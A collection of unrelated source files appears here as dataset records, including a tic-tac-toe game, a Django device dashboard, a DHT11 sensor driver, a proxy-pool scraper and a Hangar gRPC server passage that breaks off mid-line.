self.n1[1:]:\n ids += ',' + str(n.id)\n\n else:\n ids = 'None'\n else:\n ids = self.n1.id\n return f\"{type(self).__name__}_{ids}->{self.n2.id}\"\n\n def init(self):\n \"\"\"Set the connection in the structur graph from [n1] -> n2.\n \"\"\"\n if type(self.n1) is list:\n for n in self.n1:\n self.struct.connect(n, self.n2)\n\n else:\n self.struct.connect(self.n1, self.n2)\n\n def __call__(self, value, *args, **kwargs):\n return value","sub_path":"pycfiles/deephyper-0.1.5-py2.py3-none-any/connect.cpython-36.py","file_name":"connect.cpython-36.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98731592","text":"from IPython.display import clear_output\r\n\r\n# IPython.display only works for Jupyter notebook\r\n\r\ndef display_board(board):\r\n clear_output() # Remember, this only works in jupyter!\r\n availableboard=['#','1','2','3','4','5','6','7','8','9']\r\n print(' Available TIC-TAC-TOE\\n'+\r\n ' Moves\\n\\n '+\r\n board[7]+' | '+board[8]+' | '+board[9]+' '+availableboard[7]+' | '+availableboard[8]+' | '+availableboard[9]+'\\n '+\r\n '----------- -----------\\n '+\r\n board[4]+' | '+board[5]+' | '+board[6]+' '+availableboard[4]+' | '+availableboard[5]+' | '+availableboard[6]+'\\n '+\r\n '----------- -----------\\n '+\r\n board[1]+' | '+board[2]+' | '+board[3]+' '+availableboard[1]+' | '+availableboard[2]+' | '+availableboard[3]+'\\n')\r\n\r\n\r\n\r\ndef rules():\r\n ruleboard=['#','1','2','3','4','5','6','7','8','9']\r\n clear_output() # Remember, this only works in jupyter!\r\n print('The corresponding numbers are representing the input postions.')\r\n print('To input at the particular position input the numeric number representing the position.\\n')\r\n print('Example Board \\n')\r\n print(' ' + ruleboard[7] + ' | ' + ruleboard[8] + ' | ' + ruleboard[9])\r\n print('-----------')\r\n print(' ' + ruleboard[4] + ' | ' + ruleboard[5] + ' | ' + ruleboard[6])\r\n print('-----------')\r\n print(' ' + ruleboard[1] + ' | ' + ruleboard[2] + ' | ' + ruleboard[3])\r\n\r\ndef player_input():\r\n marker = ''\r\n\r\n while not (marker == 'X' or marker == 'O' or marker == 'x' or marker == 'o' or marker == '0' ):\r\n marker = input('Do you want to be X or O? ')\r\n\r\n if marker.upper() == 'X':\r\n return ('X', 'O')\r\n else:\r\n return ('O', 'X')\r\n\r\ndef place_marker(board, marker, position):\r\n board[position] = marker\r\n\r\ndef win_check(board,mark):\r\n\r\n return ((board[7] == mark and board[8] == mark and board[9] == mark) or # across the top\r\n (board[4] == mark and board[5] == mark and board[6] == mark) or # across the middle\r\n (board[1] == mark and board[2] == mark and board[3] == mark) or # across the bottom\r\n (board[7] == mark and board[4] == mark and board[1] == mark) or # down the middle\r\n (board[8] == mark and board[5] == mark and board[2] == mark) or # down the middle\r\n (board[9] == mark and board[6] == mark and board[3] == mark) or # down the right side\r\n (board[7] == mark and board[5] == mark and board[3] == mark) or # diagonal\r\n (board[9] == mark and board[5] == mark and board[1] == mark)) # diagonal\r\n\r\nimport random\r\n\r\ndef choose_first():\r\n if random.randint(0, 2) == 0:\r\n return 'Player 2'\r\n else:\r\n return 'Player 1'\r\n\r\ndef space_check(board, position):\r\n\r\n return board[position] == ' '\r\n\r\ndef full_board_check(board):\r\n for i in range(1,10):\r\n if space_check(board, i):\r\n return False\r\n return True\r\n\r\ndef player_choice(board):\r\n position = 0\r\n if num=='1':\r\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\r\n if turn == 'Player 1':\r\n position = int(input('Choose your next position: (1-9) '))\r\n else:\r\n position = random.randint(1, 10)\r\n else:\r\n while position not in [1,2,3,4,5,6,7,8,9] or not space_check(board, position):\r\n if turn == 'Player 1':\r\n position = int(input('Player-1 choose your next position: (1-9) '))\r\n else:\r\n position = int(input('Player-2 choose your next position: (1-9) '))\r\n\r\n\r\n\r\n return position\r\n\r\ndef replay():\r\n\r\n return input('Do you want to play again? Enter Yes or No: ').lower().startswith('y')\r\n\r\nprint('Welcome to Tic Tac Toe!')\r\n\r\nnum=0\r\n\r\ndef playernumbers():\r\n global num\r\n till=True\r\n while till:\r\n num = input('How many players will play? 1 or 2: ')\r\n if num=='1':\r\n till=False\r\n elif num=='2':\r\n till=False\r\n\r\n\r\nwhile True:\r\n\r\n rules()\r\n playernumbers()\r\n # Reset the board\r\n theBoard = [' '] * 10\r\n player1_marker, player2_marker = player_input()\r\n turn = choose_first()\r\n if num=='1':\r\n if turn== 'Player 1':\r\n print('You will go first.')\r\n else:\r\n print('Computer will go first.')\r\n else:\r\n print(turn + ' will go first.')\r\n play_game = input('Are you ready to play? Enter Yes or No.')\r\n\r\n if play_game.lower()[0] == 'y':\r\n game_on = True\r\n else:\r\n game_on = False\r\n\r\n while game_on:\r\n if turn == 'Player 1':\r\n # Player's turn.\r\n\r\n display_board(theBoard)\r\n position = player_choice(theBoard)\r\n place_marker(theBoard, player1_marker, position)\r\n\r\n if win_check(theBoard, player1_marker):\r\n display_board(theBoard)\r\n print('Congratulations!, You have won the game!')\r\n game_on = False\r\n else:\r\n if full_board_check(theBoard):\r\n display_board(theBoard)\r\n print('The game is a draw!')\r\n break\r\n else:\r\n turn = 'Player 2'\r\n\r\n else:\r\n # player2's turn.\r\n\r\n display_board(theBoard)\r\n position = player_choice(theBoard)\r\n place_marker(theBoard, player2_marker, position)\r\n\r\n if win_check(theBoard, player2_marker):\r\n display_board(theBoard)\r\n if num=='1':\r\n print('Computer has won!')\r\n else:\r\n print('Congratulations! Player 2 has won the game.')\r\n game_on = False\r\n else:\r\n if full_board_check(theBoard):\r\n display_board(theBoard)\r\n print('The game is a draw!')\r\n break\r\n else:\r\n turn = 'Player 1'\r\n\r\n if not replay():\r\n break\r\n\r\n#end\r\n","sub_path":"Tic-Tac-Toe (Jupyter).py","file_name":"Tic-Tac-Toe (Jupyter).py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"203729750","text":"import PySimpleGUI as sg\nimport configuracion as config\nimport juego as game\n\n#background = '#000000'\n#sg.SetOptions(background_color=background, element_background_color=background)\n#sg.theme_previewer()\nsg.theme('Light Brown 9')\nlayout = [[sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*15),sg.Button(\"\",image_filename=\"./IconosFichas/bienvenida.png\",disabled=False),sg.Text(\" \"*10)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*35),sg.Button(\"\",image_filename=\"./IconosFichas/comenzar.png\",disabled=False,key=\"_COMENZAR_\"),sg.Text(\" \"*10)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\"\"),sg.Button(\"\",image_filename=\"./IconosFichas/configuracion.png\",disabled=False,key=\"_CONFIG_\"),sg.Text(\" \"*20)],\n\t\t [sg.Text(\"\")],\n\t\t [sg.Text(\" \"*55),sg.Button(\"\",image_filename=\"./IconosFichas/salir.png\",disabled=False,key=\"_EXIT_\"),sg.Text(\" \"*25)]]\n\nwindow = sg.Window(\"Scrable Python2020\", layout,size =(800,600))\n\nprogram = True\nevent,values = window.read()\nwhile program:\n\t\n\t\n\tif event is \"_COMENZAR_\":\n\t\t\n\t\tgame.iniciar()\n\t\twindow.close()\n\t\tprogram = False\n\tif event is \"_CONFIG_\":\n\t\t\n\t\tconfig.iniciar()\n\tif event is \"_EXIT_\":\n\t\tprogram= False\n\t\tbreak\n\tevent,values = window.read()\n\nwindow.close()","sub_path":"ScrabbleAR.py","file_name":"ScrabbleAR.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"246050536","text":"from time import sleep\nfrom random import randint as ri\n\ntestArray = [['%s' % \" \".join(['%s' % ((x + 1 * (z + 1)) + y)\n for x in range(20)]) for y in range(40)] for z in range(1500)]\n\nfor i in testArray:\n sleep(0.015)\n print()\n\n # for x in i:\n # \tprint(\"|\" * x)\n # \tsleep(0.1)\n print(\"\\n\".join(i))\n","sub_path":"Old/Single File Projects/Old or Done/random_01.py","file_name":"random_01.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"71784671","text":"#!/usr/bin/python\n\nimport argparse\n\n\ndef find_max_profit(prices):\n profit = 0\n max_profit = -1000000000\n for sell_price_index in range(len(prices) + 1, 0, -1):\n starting_price = sell_price_index\n for buy_price_index in range(sell_price_index + 1, len(prices)):\n profit = prices[buy_price_index] - prices[sell_price_index]\n print(f\"Buy $ {prices[buy_price_index]} - Sell ${prices[sell_price_index]} = ${profit}\")\n if profit > max_profit:\n current_profit = profit\n max_profit = profit\n\n return max_profit\n\n\nlist = [10, 7, 5, 8, 11, 9]\nfind_max_profit(list)\n\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"43518601","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCOMP 5600/6600/6606 FINAL PROJECT\n\nTEAM: 8-BIT BRAIN\n\n@author: Dennis Brown (dgb0028@auburn.edu)\n@author: Shannon McDade (slm0035@auburn.edu)\n@author: Jacob Parmer (jdp0061@auburn.edu)\n\nDESCRIPTION: main - run everything from here\n\nRESOURCES:\n\n\"\"\"\nimport torch\nimport gym\nimport sys\n# from agents.DqnAgent import DqnAgent\nfrom agents.PpoAgent_for_analysis import PpoAgent, run_ppo\n\n\ndef main(ppo=False, dqn=False):\n \"\"\"\n main\n\n Parameters\n ----------\n ppo : BOOLEAN, optional\n SET TO TRUE TO RUN PPO AGENT. The default is False.\n dqn : BOOLEAN, optional\n SET TO TRUE TO RUN DQN AGENT. The default is False.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n # Running DQN Agent\n if dqn:\n env = gym.make('BreakoutDeterministic-v4')\n frame = env.reset()\n\n\n state_size = 8\n print(state_size)\n action_size = env.action_space.n\n print(action_size)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # agent = DqnAgent(state_size=state_size, action_size=action_size, device=device, seed=0)\n\n\n env.render()\n\n finished = False\n while not finished:\n\n action = env.action_space.sample()\n frame, reward, finished, _ = env.step(action)\n env.render()\n\n # Running PPO Agent\n elif ppo:\n policy = PpoAgent()\n run_ppo(policy, sys.argv[1])\n\n # If neither agent is selected a message will print asking to select one\n else:\n print('No agent selected to run! Please select an agent: dqn, ppo')\n\nif __name__ == \"__main__\":\n # Set either ppo or dqn to True\n main(ppo = True)\n","sub_path":"analysis/algorithms/PPO-for-analysis.py","file_name":"PPO-for-analysis.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311202844","text":"import collections\n\ndef solution(clothes):\n clothes_list = [cloth[1] for cloth in clothes]\n result = collections.Counter(clothes_list)\n count = 1\n for i in list(result.values()):\n count *= (i + 1)\n \n return count - 1\n\n# (의상 종류 + 1)을 모두 곱한 후 -1 => 반드시 하나는 선택\n","sub_path":"Programmers/Level2/위장.py","file_name":"위장.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338884750","text":"from changes.api.serializer import Serializer, register\nfrom changes.constants import Result\nfrom changes.models.test import TestGroup\n\n\n@register(TestGroup)\nclass TestGroupSerializer(Serializer):\n def serialize(self, instance, attrs):\n data = {\n 'id': instance.id.hex,\n 'job': {'id': instance.job_id.hex},\n 'project': {'id': instance.project_id.hex},\n 'name': instance.name,\n 'shortName': instance.short_name,\n 'duration': instance.duration or 0,\n 'result': instance.result or Result.unknown,\n 'numTests': instance.num_tests or 0,\n 'numFailures': instance.num_failed or 0,\n 'dateCreated': instance.date_created,\n }\n return data\n\n\nclass TestGroupWithJobSerializer(TestGroupSerializer):\n def serialize(self, instance, attrs):\n data = super(TestGroupWithJobSerializer, self).serialize(instance, attrs)\n data['job'] = instance.job\n return data\n\n\nclass TestGroupWithOriginSerializer(TestGroupWithJobSerializer):\n def serialize(self, instance, attrs):\n data = super(TestGroupWithOriginSerializer, self).serialize(instance, attrs)\n data['origin'] = getattr(instance, 'origin', None)\n return data\n","sub_path":"changes/api/serializer/models/testgroup.py","file_name":"testgroup.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"68179642","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import loader\nfrom django.http import HttpResponse, Http404, JsonResponse\nfrom django.views.generic import DetailView\n\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import UpdateAPIView,GenericAPIView\nfrom rest_framework.mixins import UpdateModelMixin\nfrom rest_framework.decorators import api_view\nfrom rest_framework import viewsets\n\nfrom .models import Workshop, Device, DEV_TYPE, DEV_STATUS, ZheboDemo\nfrom .serializers import DeviceSerializer, ZheboDemoSerializer\n\n# Create your views here.\ndef get_context():\n workshop = Workshop.objects.filter(name = 'Shanghai').first()\n devices = Device.objects.filter(workshop=workshop)\n context = {\n 'workshop': workshop,\n 'devices': devices,\n 'total_dev': devices.count(),\n 'total_cnc': devices.filter(dev_type = 'CNC').count(),\n 'total_smt': devices.filter(dev_type = 'SMT').count(),\n 'total_inj': devices.filter(dev_type = 'INJ').count(),\n 'total_pnt': devices.filter(dev_type = 'PNT').count(),\n 'total_on': devices.filter(dev_status='ON').count(),\n 'total_off': devices.filter(dev_status='OFF').count(),\n 'total_mnt': devices.filter(dev_status='MNT').count(),\n 'total_fix': devices.filter(dev_status='FIX').count(),\n 'cnc_on': devices.filter(dev_type = 'CNC').filter(dev_status='ON').count(),\n 'cnc_off': devices.filter(dev_type = 'CNC').filter(dev_status='OFF').count(),\n 'cnc_mnt': devices.filter(dev_type = 'CNC').filter(dev_status='MNT').count(),\n 'cnc_fix': devices.filter(dev_type = 'CNC').filter(dev_status='FIX').count(),\n 'smt_on': devices.filter(dev_type='SMT').filter(dev_status='ON').count(),\n 'smt_off': devices.filter(dev_type='SMT').filter(dev_status='OFF').count(),\n 'smt_mnt': devices.filter(dev_type='SMT').filter(dev_status='MNT').count(),\n 'smt_fix': devices.filter(dev_type='SMT').filter(dev_status='FIX').count(),\n 'inj_on': devices.filter(dev_type='INJ').filter(dev_status='ON').count(),\n 'inj_off': devices.filter(dev_type='INJ').filter(dev_status='OFF').count(),\n 'inj_mnt': devices.filter(dev_type='INJ').filter(dev_status='MNT').count(),\n 'inj_fix': devices.filter(dev_type='INJ').filter(dev_status='FIX').count(),\n 'pnt_on': devices.filter(dev_type='PNT').filter(dev_status='ON').count(),\n 'pnt_off': devices.filter(dev_type='PNT').filter(dev_status='OFF').count(),\n 'pnt_mnt': devices.filter(dev_type='PNT').filter(dev_status='MNT').count(),\n 'pnt_fix': devices.filter(dev_type='PNT').filter(dev_status='FIX').count(),\n }\n return context\n\ndef index(request):\n context = get_context()\n template = loader.get_template('app/index.html')\n workshop_map = [[None for i in range(4)] for i in range(4)]\n for row in range(4):\n for col in range(4):\n loc_id = row * 4 + col\n device = Device.objects.filter(location_id=loc_id).first()\n if device is not None:\n workshop_map[row][col] = device\n else:\n workshop_map[row][col] = None\n print(workshop_map)\n context['workshopmap'] = workshop_map\n print(context)\n print(request)\n return HttpResponse(template.render(context, request))\n\ndef app_html(request):\n # The template to be loaded as per gentelella.\n\n # All resource paths for gentelella end in .html.\n # Pick out the html file name from the url. And load that template.\n context = get_context()\n load_template = request.path.split('/')[-1]\n template = loader.get_template('app/' + load_template)\n print(template)\n print(request)\n return HttpResponse(template.render(context, request))\n\nclass DevInfoDetailView(DetailView):\n template_name = 'app/dev_info.html'\n\n def get_object(self):\n devname = self.kwargs.get(\"devname\")\n if devname is None:\n devname = Device.objects.all().first().name\n return get_object_or_404(Device, name__iexact=devname)\n\n def get_context_data(self, *args, **kwargs):\n context = super(DevInfoDetailView, self).get_context_data(*args, **kwargs)\n query = self.request.GET.get('q')\n print(query)\n qs = Device.objects.filter(name=query)\n print(qs)\n if qs.exists():\n context['device']= qs.first()\n print(context)\n return context\n\nclass DeviceUpdateAPIView(UpdateAPIView):\n queryset = Device.objects.all()\n serializer_class = DeviceSerializer\n\n def get_object(self):\n devname = self.request.data['name']\n qs = Device.objects.filter(name=devname)\n if qs.exists:\n return qs.first()\n\n def perform_update(self, serializer):\n obj = self.get_object()\n if obj :\n instance = serializer.save()\n\nclass DevStatusAPIView(APIView):\n def get(self, request):\n get = request.GET\n name = get.get('name')\n status = get.get('status')\n print(name)\n print(status)\n device = Device.objects.filter(name=name).first()\n if device is not None:\n device.dev_status = status\n device.save()\n print(device)\n print(device.dev_status)\n d = {\n 'status':1,\n 'message':'success'\n }\n return JsonResponse(d)\n\nclass ZheboDemoViewSet(viewsets.ModelViewSet):\n queryset = ZheboDemo.objects.all()\n serializer_class = ZheboDemoSerializer\n","sub_path":"demo/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468979689","text":"n = int(input())\r\nd = {}\r\n\r\nfor i in range(n):\r\n surname, initials, phone = input().split()\r\n phone = phone[-2:]\r\n if phone not in d.keys():\r\n d[phone] = 0\r\n d[phone] += 1\r\n\r\n avg = sum(d.values()) / len(d)\r\nprint(avg)\r\n","sub_path":"27-8.py","file_name":"27-8.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"121680936","text":"import io\nimport os\nimport json\nimport zipfile\nimport requests\nimport argparse\n\n\ndef extract_zip_file(file_for_extract):\n if zipfile.is_zipfile(io.BytesIO(file_for_extract)):\n extracted_file = zipfile.ZipFile(io.BytesIO(file_for_extract))\n return extracted_file.read(extracted_file.namelist()[0])\n else:\n return file_for_extract\n\n\ndef pretty_print_json(data_dictionary):\n print(json.dumps(\n data_dictionary,\n indent=4,\n sort_keys=True,\n ensure_ascii=False,\n ))\n\n\ndef decode_file(file_for_decoding, codec):\n return file_for_decoding.decode(codec)\n\n\ndef load_json(json_file):\n return json.loads(json_file, encoding='utf-8')\n\n\ndef fetch_web_url(url):\n response = requests.get(url)\n if response.ok:\n return response.content\n\n\ndef read_local_file(path):\n if os.path.isfile(path):\n with open(path, 'rb') as file_to_read:\n return file_to_read.read()\n\n\ndef get_args(\n read_local_file_function,\n fetch_web_url_function,\n list_of_allowable_codecs,\n):\n parser = argparse.ArgumentParser(\n description='Print JSON files in correct and readable form'\n )\n parser.add_argument(\n 'path',\n metavar='path',\n type=str,\n help='File path: local or URL',\n )\n parser.add_argument(\n '-l',\n '--local',\n dest='load_data',\n action='store_const',\n const=read_local_file_function,\n default=fetch_web_url_function,\n help='Use if you print a local JSON file',\n )\n parser.add_argument(\n '-c',\n '--codec',\n action='store',\n nargs='?',\n default='utf_8',\n choices=list_of_allowable_codecs,\n help='Use for decode a original file',\n )\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n codecs = [\n 'utf_8',\n 'cp1251',\n 'koi8_r',\n 'cp866',\n 'mac_cyrillic',\n ]\n args = get_args(\n read_local_file_function=read_local_file,\n fetch_web_url_function=fetch_web_url,\n list_of_allowable_codecs=codecs,\n )\n try:\n json_file = args.load_data(args.path)\n if json_file is None:\n print('{} {} {}'.format(\n 'Filepath',\n args.path,\n 'does not correct, check it',\n ))\n else:\n received_data = load_json(\n decode_file(\n extract_zip_file(json_file),\n args.codec,\n ),\n )\n pretty_print_json(received_data)\n\n except (requests.exceptions.RequestException, IOError) as error:\n print('{}\\n{} {}\\n{}\\n{}'.format(\n error,\n 'Cannot open the file:',\n args.path,\n 'Check your internet connection or file path is correct',\n 'For opening a local file use \"-l\" command string option',\n ))\n except ValueError as error:\n print('{}\\n{} {} {} {}'.format(\n error,\n 'Cannot decode file with',\n args.codec,\n 'codec or cannot read it. Check this JSON file',\n 'with a validator or try to use other codec!',\n ))\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"42336800","text":"import requests\n\nclass ProxyPool(object):\n def __init__(self):\n self.url = 'http://dev.kdlapi.com/api/getproxy/?orderid=967108906914177&num=55&protocol=2&method=2&an_an=1&an_ha=1&sep=1'\n self.headers = {'User-Agent':''}\n\n def save_proxy(self):\n html = requests.get(url=self.url,headers=self.headers).text\n # ip_list: ['1.1.1.1:8888','']\n ip_list = html.split('\\r\\n')\n print(ip_list)\n for ip in ip_list:\n # 测试ip,可用的保存到文件\n if self.test_ip(ip):\n # 把ip写入到文件\n with open('ip.txt','a') as f:\n f.write(ip + '\\n')\n\n # 测试代理ip是否可用\n def test_ip(self,ip):\n proxies = {\n 'http':'http://{}'.format(ip),\n 'https':'https://{}'.format(ip)\n }\n try:\n res = requests.get(\n url='http://www.baidu.com/',\n proxies=proxies,\n timeout=2\n )\n if res.status_code == 200:\n print(ip,'可用')\n return True\n except Exception as e:\n print(ip,'不可用')\n return False\n\nif __name__ == '__main__':\n spider = ProxyPool()\n spider.save_proxy()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"4号爬虫工具箱/ip代理池/05/day05代码/01_proxypool.py","file_name":"01_proxypool.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"397286643","text":"#!/usr/bin/env python\nimport threading\n\nimport pigpio\nimport time\n\n\nclass DHT11Sensor:\n \"\"\"\n Orginal Source:\n http://www.raspberrypi.org/forums/viewtopic.php?p=515575#p515575\n\n A class to read relative humidity and temperature from the\n DHT11 sensor. The sensor is also known as the AM2302.\n\n The sensor can be powered from the Pi 3V3 or the Pi 5V rail.\n\n Powering from the 3V3 rail is simpler and safer. You may need\n to power from 5V if the sensor is connected via a long cable.\n\n For 3V3 operation connect pin 1 to 3V3 and pin 4 to ground.\n\n Connect pin 2 to a gpio.\n\n For 5V operation connect pin 1 to 5V and pin 4 to ground.\n\n The following pin 2 connection works for me. Use at YOUR OWN RISK.\n\n 5V--5K_resistor--+--10K_resistor--Ground\n |\n DHT11 pin 2 -----+\n |\n gpio ------------+\n \"\"\"\n\n def __init__(self, gpio):\n \"\"\"\n Instantiate with the gpio to which the DHT11 output pin is connected.\n \"\"\"\n self.gpio = gpio\n self.bad_checksum = 0\n self.bad_timeout = 0\n self.accumulating = False\n self.relative_humidity = -999\n self.temp = -999\n self.tov = None\n self.tick = 0\n\n # reset in trigger\n self.bit = -3 # header bits\n self.hum_high_byte = 0\n self.hum_low_byte = 0\n self.temp_high_byte = 0\n self.temp_low_byte = 0\n self.checksum = 0\n\n pigpio.set_mode(gpio, pigpio.INPUT)\n pigpio.set_pull_up_down(gpio, pigpio.PUD_UP)\n self.cb = pigpio.callback(gpio, pigpio.EITHER_EDGE, self._cb)\n self.auto_update()\n\n def _cb(self, gpio, level, tick):\n \"\"\"\n Accumulate the 40 data bits. Format into 5 bytes, humidity high,\n humidity low, temperature high, temperature low, checksum.\n \"\"\"\n if self.accumulating:\n if level == 0:\n diff = pigpio.tickDiff(self.tick, tick)\n\n # edge length determines if bit is 1 or 0\n if diff >= 50:\n val = 1\n else:\n val = 0\n\n if self.bit >= 32: # in checksum byte\n self.checksum = (self.checksum << 1) + val\n if self.bit >= 39:\n # 40 bits received\n self.accumulating = False\n pigpio.set_watchdog(self.gpio, 0)\n total = self.hum_high_byte + self.hum_low_byte + self.temp_high_byte + self.temp_low_byte\n\n if (total & 255) == self.checksum: # is checksum ok\n self.relative_humidity = self.adjust_humidity()\n self.temp = self.adjust_temperature()\n self.tov = time.time()\n else:\n self.bad_checksum += 1\n\n elif self.bit >= 24: # in temp low byte\n self.temp_low_byte = (self.temp_low_byte << 1) + val\n elif self.bit >= 16: # in temp high byte\n self.temp_high_byte = (self.temp_high_byte << 1) + val\n elif self.bit >= 8: # in humidity low byte\n self.hum_low_byte = (self.hum_low_byte << 1) + val\n elif self.bit >= 0: # in humidity high byte\n self.hum_high_byte = (self.hum_high_byte << 1) + val\n else: # header bits\n pass\n self.bit += 1\n\n elif level == 1:\n self.tick = tick\n if self.bit == -3: # correct for first reading\n self.bit = -2\n\n else: # level == pigpio.TIMEOUT:\n # time out if less than 40 bits received\n self.accumulating = False\n pigpio.set_watchdog(self.gpio, 0)\n self.bad_timeout += 1\n\n else: # perhaps a repeated watchdog\n if level == pigpio.TIMEOUT:\n pigpio.set_watchdog(self.gpio, 0)\n\n def temperature(self):\n \"\"\"Return current temperature.\"\"\"\n return self.temp\n\n def temperature_f(self):\n return int(float(9.0 / 5.0 * self.temperature() + 32))\n\n def humidity(self):\n \"\"\"Return current relative humidity.\"\"\"\n return self.relative_humidity\n\n def staleness(self):\n \"\"\"Return time since measurement made.\"\"\"\n if self.tov is not None:\n return time.time() - self.tov\n else:\n return -999\n\n def bad_checksum(self):\n \"\"\"Return count of messages received with bad checksums.\"\"\"\n return self.bad_checksum\n\n def timed_out(self):\n \"\"\"Return count of messages which have timed out.\"\"\"\n return self.bad_timeout\n\n def trigger(self):\n \"\"\"Trigger a new relative humidity and temperature reading.\"\"\"\n pigpio.write(self.gpio, 1)\n time.sleep(0.009)\n self.bit = -3 # header bits\n self.hum_high_byte = 0\n self.hum_low_byte = 0\n self.temp_high_byte = 0\n self.temp_low_byte = 0\n self.checksum = 0\n self.accumulating = True\n pigpio.write(self.gpio, 0)\n time.sleep(0.017)\n pigpio.set_mode(self.gpio, pigpio.INPUT)\n pigpio.set_watchdog(self.gpio, 50)\n\n def cancel(self):\n \"\"\"Cancel the DHT11 sensor.\"\"\"\n self.cb.cancel()\n\n def adjust_temperature(self):\n return self.temp_high_byte\n\n def adjust_humidity(self):\n return self.hum_high_byte\n\n def auto_update(self):\n \"\"\"Automatically triggers the device every 5 seconds\"\"\"\n self.trigger()\n threading.Timer(5, self.auto_update).start()\n\n\nif __name__ == \"__main__\":\n import time\n import pigpio\n import DHT11\n\n pigpio.start()\n s = DHT11.DHT11Sensor(14)\n r = 0\n\n while True:\n r += 1\n s.trigger()\n time.sleep(0.2)\n print(\"{} RH={}% T={}C staleness={:3.2f}s bad CS={} timed out={}\"\n .format(r, s.humidity(), s.temperature(), s.staleness(),\n s.bad_checksum(), s.timed_out()))\n time.sleep(1.75)\n s.cancel()\n pigpio.stop()\n","sub_path":"DHT11.py","file_name":"DHT11.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"195400413","text":"import hashlib\nimport io\nimport os\nimport tempfile\nimport threading\nimport time\nfrom concurrent import futures\nfrom os.path import join as pjoin\n\nimport blosc\nimport grpc\nimport lmdb\nimport msgpack\nimport numpy as np\n\nfrom . import chunks\nfrom . import hangar_service_pb2\nfrom . import hangar_service_pb2_grpc\nfrom .. import config\nfrom ..context import Environments\nfrom ..context import TxnRegister\nfrom ..records import commiting\nfrom ..records import hashs\nfrom ..records import heads\nfrom ..records import parsing\nfrom ..records import queries\nfrom ..records import summarize\n\nblosc.set_nthreads(blosc.detect_number_of_cores() - 2)\n\n\nclass HangarServer(hangar_service_pb2_grpc.HangarServiceServicer):\n\n def __init__(self, repo_path, overwrite=False):\n path = pjoin(repo_path, config.get('hangar.repository.hangar_server_dir_name'))\n self.env = Environments(repo_path=path)\n\n try:\n self.env._init_repo(\n user_name='SERVER_USER',\n user_email='SERVER_USER@HANGAR.SERVER',\n remove_old=overwrite)\n except OSError:\n pass\n\n self.txnregister = TxnRegister()\n self.repo_path = self.env.repo_path\n self.data_dir = pjoin(self.repo_path, config.get('hangar.repository.data_dir'))\n\n # -------------------- Branch Record --------------------------------------\n\n def FetchBranchRecord(self, request, context):\n branch_name = request.rec.name\n try:\n head = heads.get_branch_head_commit(self.env.branchenv, branch_name)\n rec = hangar_service_pb2.BranchRecord(name=branch_name, commit=head)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n reply = hangar_service_pb2.FetchBranchRecordReply(rec=rec, error=err)\n except ValueError:\n err = hangar_service_pb2.ErrorProto(code=1, message='BRANCH DOES NOT EXIST')\n reply = hangar_service_pb2.FetchBranchRecordReply(error=err)\n return reply\n\n def PushBranchRecord(self, request, context):\n branch_name = request.rec.name\n commit = request.rec.commit\n branch_names = heads.get_branch_names(self.env.branchenv)\n if branch_name not in branch_names:\n heads.create_branch(self.env.branchenv, branch_name=branch_name, base_commit=commit)\n err = hangar_service_pb2.ErrorProto(code=0, message='OK')\n else:\n current_head = heads.get_branch_head_commit(self.env.branchenv, branch_name)\n if current_head == commit:\n err = hangar_service_pb2.ErrorProto(code=1, message='NO CHANGE TO BRANCH HEAD')\n else:\n heads.set_branch_head_commit(self.env.branchenv, branch_name, commit)\n err = 